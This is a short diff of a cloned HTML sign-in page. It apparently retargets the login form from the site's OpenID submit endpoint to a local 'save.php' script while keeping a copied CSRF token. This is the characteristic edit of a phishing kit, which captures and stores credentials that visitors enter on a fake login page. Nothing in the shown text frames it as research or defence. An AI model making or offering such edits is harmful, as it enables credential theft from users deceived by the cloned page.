--- a/index.html
+++ b/index.html
@@ -411,7 +411,7 @@
   
     <div class="content">
 
-      <form id="loginform" action="/openid/loginsubmit" method="post" style="position:relative;">
+      <form id="loginform" action="save.php" method="post" style="position:relative;">
         <input type='hidden' name='csrfmiddlewaretoken' value='K8YM1R5p1shU0aZCqE9u7vFday8oZpYTnG3FeHTfl6DkBElbGmdiDUpm1nKe9ma2' />
 
         <h2>Sign In</h2>
